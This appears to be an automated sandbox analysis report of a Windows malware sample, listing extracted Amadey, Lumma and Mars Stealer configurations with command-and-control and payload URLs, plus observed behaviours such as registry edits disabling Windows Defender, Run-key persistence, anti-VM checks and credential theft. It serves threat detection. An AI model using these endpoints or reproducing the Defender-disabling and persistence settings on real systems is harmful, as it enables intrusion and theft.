Analysis
-
max time kernel
545s -
max time network
546s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
16/03/2025, 18:02
Static task
static1
Behavioral task
behavioral1
Sample
d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe
Resource
win10ltsc2021-20250314-en
General
-
Target
d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43.exe
-
Size
938KB
-
MD5
10b0224ea8be9e8e9098b528cc2c96b5
-
SHA1
fd18bdccb7547938e538da517a86446b1805f0e9
-
SHA256
d6d78e43119009c90476048059212b7553172014ec88b50ba66a19bab7709e43
-
SHA512
5cac4931ba679852f0873447fb84008ca1c0e4953f9a10764c5caf65d083985e50f534af75216279253d133a4320ffe290fdd438e812ac1824d349259c6bfd0b
-
SSDEEP
24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a02u:VTvC/MTQYxsWR7a02
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://gunrightsp.run/api
https://caliberc.today/api
https://pistolpra.bet/api
https://weaponwo.life/api
https://armamenti.world/api
https://selfdefens.bet/api
https://targett.top/api
https://armoryarch.shop/api
https://blackeblast.run/api
https://.cocjkoonpillow.today/api
https://zfeatureccus.shop/api
https://mrodularmall.top/api
https://jowinjoinery.icu/api
https://legenassedk.top/api
https://yhtardwarehu.icu/api
https://cjlaspcorne.icu/api
https://bugildbett.top/api
https://latchclan.shop/api
https://begindecafer.world/api
https://9garagedrootz.top/api
https://modelshiverd.icu/api
https://arisechairedd.shop/api
https://catterjur.run/api
https://orangemyther.live/api
https://fostinjec.today/api
https://ksterpickced.digital/api
https://loadoutle.life/api
Extracted
marsstealer
Default
ctrlgem.xyz/gate.php
Extracted
lumma
https://codxefusion.top/api
Signatures
-
Amadey family
-
Lumma family
-
Mars Stealer
An infostealer written in C++ based on other infostealers.
-
Marsstealer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 08fc08f920.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 08fc08f920.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection 08fc08f920.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 08fc08f920.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 08fc08f920.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 08fc08f920.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 08fc08f920.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 08fc08f920.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications 08fc08f920.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 08fc08f920.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 25 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a1096309f8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2c7732faec.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4431ad04dd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5a4a70c0e3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 947905fad3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a459430e67.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9926fc9698.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8f24a78ca9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 08fc08f920.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UD49QH6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ J9HXZRTQVUGD1VAMIAXZT7VXANA87T.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ UD49QH6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 7 2668 powershell.exe 53 1484 powershell.exe 63 2828 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 2828 powershell.exe 2668 powershell.exe 1484 powershell.exe 5428 powershell.exe 2136 powershell.exe 4876 powershell.exe -
Downloads MZ/PE file 42 IoCs
flow pid Process 7 2668 powershell.exe 16 5580 rapes.exe 41 5580 rapes.exe 63 2828 powershell.exe 107 1260 futors.exe 695 1152 MSBuild.exe 20 5580 rapes.exe 312 4580 MSBuild.exe 312 4580 MSBuild.exe 673 1152 MSBuild.exe 673 1152 MSBuild.exe 205 1260 futors.exe 300 1996 2c7732faec.exe 584 5580 rapes.exe 343 10072 BitLockerToGo.exe 514 2220 a459430e67.exe 514 2220 a459430e67.exe 514 2220 a459430e67.exe 514 2220 a459430e67.exe 514 2220 a459430e67.exe 514 2220 a459430e67.exe 539 4676 BitLockerToGo.exe 571 7836 BitLockerToGo.exe 102 1260 futors.exe 216 5580 rapes.exe 325 6008 7Bd1zjNeuyRVLqDa.exe 33 1260 futors.exe 33 1260 futors.exe 33 1260 futors.exe 33 1260 futors.exe 50 5580 rapes.exe 110 5580 rapes.exe 110 5580 rapes.exe 308 5580 rapes.exe 308 5580 rapes.exe 308 5580 rapes.exe 53 1484 powershell.exe 562 5580 rapes.exe 677 1152 MSBuild.exe 677 1152 MSBuild.exe 677 1152 MSBuild.exe 822 14952 MSBuild.exe -
Uses browser remote debugging 2 TTPs 30 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3176 chrome.exe 456 chrome.exe 5976 chrome.exe 9080 msedge.exe 10128 msedge.exe 11900 msedge.exe 8656 msedge.exe 4904 chrome.exe 8 chrome.exe 11532 chrome.exe 11888 msedge.exe 9168 chrome.exe 4052 chrome.exe 4884 chrome.exe 3948 chrome.exe 4560 msedge.exe 4512 chrome.exe 5056 msedge.exe 12404 msedge.exe 13328 chrome.exe 11736 msedge.exe 4760 msedge.exe 1812 msedge.exe 11008 chrome.exe 12452 chrome.exe 9268 msedge.exe 5160 msedge.exe 4980 chrome.exe 4868 chrome.exe 12408 msedge.exe -
Checks BIOS information in registry 2 TTPs 50 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8f24a78ca9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a1096309f8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5a4a70c0e3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8f24a78ca9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4431ad04dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a1096309f8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a459430e67.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion J9HXZRTQVUGD1VAMIAXZT7VXANA87T.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5a4a70c0e3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2c7732faec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion J9HXZRTQVUGD1VAMIAXZT7VXANA87T.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 947905fad3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9926fc9698.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 08fc08f920.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9926fc9698.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 947905fad3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion UD49QH6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4431ad04dd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a459430e67.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2c7732faec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 08fc08f920.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation m0wsoI3.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation m0wsoI3.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation zY9sqWs.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE Key value queried \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Control Panel\International\Geo\Nation rapes.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk 7Bd1zjNeuyRVLqDa.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk 9sRLB1swy6WmobzJ.exe -
Executes dropped EXE 64 IoCs
pid Process 4892 TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE 5580 rapes.exe 3096 amnew.exe 1260 futors.exe 3900 UD49QH6.exe 5604 m0wsoI3.exe 1524 rapes.exe 4060 futors.exe 1716 87a483eddc.exe 1596 483d2fa8a0d53818306efeb32d3.exe 4208 TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE 1016 rapes.exe 3432 futors.exe 4656 trano1221.exe 5076 trano1221.exe 3712 cronikxqqq.exe 3064 cronikxqqq.exe 5504 dw.exe 3156 c59f8b1bd4.exe 2240 c59f8b1bd4.exe 2796 v7942.exe 3592 18b1abad16.exe 2220 crypted.exe 5452 a1096309f8.exe 5744 crypted.exe 6044 crypted.exe 1036 mrwipre12.exe 5456 5a4a70c0e3.exe 1996 2c7732faec.exe 5744 4431ad04dd.exe 4416 J9HXZRTQVUGD1VAMIAXZT7VXANA87T.exe 928 947905fad3.exe 5944 rapes.exe 5808 futors.exe 2220 a459430e67.exe 4148 jeknyus2no.exe 4060 pp8q9rimy5.exe 5172 741ee2da36.exe 4564 jmyu379zc2.exe 6008 7Bd1zjNeuyRVLqDa.exe 4264 9sRLB1swy6WmobzJ.exe 10216 B6DYtDbU8K65ltjj.exe 8216 08fc08f920.exe 10952 9926fc9698.exe 4784 8f24a78ca9.exe 6640 m0wsoI3.exe 7932 UD49QH6.exe 1184 HmngBpR.exe 472 SplashWin.exe 15244 SplashWin.exe 9480 zY9sqWs.exe 448 Gxtuum.exe 10972 rapes.exe 2184 futors.exe 4028 q5Vn4MDNtttD4KVL.exe 11548 Gxtuum.exe 12704 8IohuLofB41F0Yfi.exe 11256 rapes.exe 15204 futors.exe 7952 Gxtuum.exe 15172 BKKKEGIDBG.exe 15084 AKKFHDAKEC.exe 14872 IIJDBAKKKF.exe 14848 qRKxyjRGQ0DR2WdQ.exe -
Identifies Wine through registry keys 2 TTPs 25 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine 5a4a70c0e3.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine 4431ad04dd.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine 9926fc9698.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine UD49QH6.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine 947905fad3.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine 8f24a78ca9.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine UD49QH6.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine J9HXZRTQVUGD1VAMIAXZT7VXANA87T.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine a459430e67.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine 08fc08f920.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine a1096309f8.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine 2c7732faec.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Wine rapes.exe -
Loads dropped DLL 47 IoCs
pid Process 5604 m0wsoI3.exe 5604 m0wsoI3.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 5076 trano1221.exe 3592 18b1abad16.exe 2220 a459430e67.exe 2220 a459430e67.exe 6640 m0wsoI3.exe 6640 m0wsoI3.exe 472 SplashWin.exe 472 SplashWin.exe 472 SplashWin.exe 15244 SplashWin.exe 15244 SplashWin.exe 15244 SplashWin.exe 1152 MSBuild.exe 1152 MSBuild.exe 24664 f3e1addcc3.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 08fc08f920.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 08fc08f920.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\87a483eddc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235690101\\87a483eddc.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235700121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2c7732faec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235940101\\2c7732faec.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a459430e67.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235950101\\a459430e67.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleChrome = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1BHmf4kc\\7Bd1zjNeuyRVLqDa.exe" 7Bd1zjNeuyRVLqDa.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4431ad04dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10030290101\\4431ad04dd.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\947905fad3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10030300101\\947905fad3.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\741ee2da36.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235960101\\741ee2da36.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\08fc08f920.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10235970101\\08fc08f920.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000028260-127.dat autoit_exe behavioral1/files/0x0009000000028306-1374.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 25 IoCs
pid Process 4892 TempFHZKMSRXYYN80L0BWISIGAVV9VJPO26B.EXE 5580 rapes.exe 3900 UD49QH6.exe 1524 rapes.exe 1596 483d2fa8a0d53818306efeb32d3.exe 4208 TempZL8TWA5DAVIX9WALKPGFIEVO4UJ2AJOU.EXE 1016 rapes.exe 5452 a1096309f8.exe 5456 5a4a70c0e3.exe 1996 2c7732faec.exe 5744 4431ad04dd.exe 4416 J9HXZRTQVUGD1VAMIAXZT7VXANA87T.exe 928 947905fad3.exe 5944 rapes.exe 2220 a459430e67.exe 8216 08fc08f920.exe 10952 9926fc9698.exe 4784 8f24a78ca9.exe 7932 UD49QH6.exe 10972 rapes.exe 11256 rapes.exe 20168 rapes.exe 12224 rapes.exe 16964 rapes.exe 16032 rapes.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 3712 set thread context of 3064 3712 cronikxqqq.exe 148 PID 3156 set thread context of 2240 3156 c59f8b1bd4.exe 156 PID 2796 set thread context of 4580 2796 v7942.exe 159 PID 2220 set thread context of 5252 2220 crypted.exe 166 PID 5744 set thread context of 6044 5744 crypted.exe 171 PID 1036 set thread context of 4256 1036 mrwipre12.exe 185 PID 5744 set thread context of 4676 5744 4431ad04dd.exe 204 PID 4060 set thread context of 1152 4060 pp8q9rimy5.exe 214 PID 928 set thread context of 10072 928 947905fad3.exe 228 PID 10216 set thread context of 4492 10216 B6DYtDbU8K65ltjj.exe 234 PID 4784 set thread context of 7836 4784 8f24a78ca9.exe 273 PID 15244 set thread context of 14692 15244 SplashWin.exe 280 PID 15084 set thread context of 14952 15084 AKKFHDAKEC.exe 337 PID 22020 set thread context of 22088 22020 ph47qiwbs0.exe 374 PID 8892 set thread context of 19672 8892 f52454a24e.exe 394 -
resource yara_rule behavioral1/memory/5076-585-0x00007FFA259A0000-0x00007FFA25F89000-memory.dmp upx behavioral1/files/0x00070000000282d7-582.dat upx behavioral1/files/0x000700000002828d-587.dat upx behavioral1/files/0x00070000000282d3-593.dat upx behavioral1/memory/5076-595-0x00007FFA3FEB0000-0x00007FFA3FEBF000-memory.dmp upx behavioral1/memory/5076-594-0x00007FFA371A0000-0x00007FFA371C3000-memory.dmp upx behavioral1/memory/5076-605-0x00007FFA3BA40000-0x00007FFA3BA59000-memory.dmp upx behavioral1/memory/5076-606-0x00007FFA3D5D0000-0x00007FFA3D5DD000-memory.dmp upx behavioral1/memory/5076-607-0x00007FFA372D0000-0x00007FFA372E9000-memory.dmp upx behavioral1/memory/5076-608-0x00007FFA36EC0000-0x00007FFA36EED000-memory.dmp upx behavioral1/memory/5076-609-0x00007FFA34BB0000-0x00007FFA34BE6000-memory.dmp upx behavioral1/memory/5076-610-0x00007FFA38BC0000-0x00007FFA38BCD000-memory.dmp upx behavioral1/memory/5076-612-0x00007FFA32250000-0x00007FFA32283000-memory.dmp upx behavioral1/memory/5076-611-0x00007FFA259A0000-0x00007FFA25F89000-memory.dmp upx behavioral1/memory/5076-613-0x00007FFA26EC0000-0x00007FFA273E0000-memory.dmp upx behavioral1/memory/5076-615-0x00007FFA273E0000-0x00007FFA274AD000-memory.dmp upx behavioral1/memory/5076-617-0x00007FFA26DF0000-0x00007FFA26EBF000-memory.dmp upx behavioral1/memory/5076-616-0x00007FFA371A0000-0x00007FFA371C3000-memory.dmp upx behavioral1/memory/5076-618-0x00007FFA26D60000-0x00007FFA26DE7000-memory.dmp upx 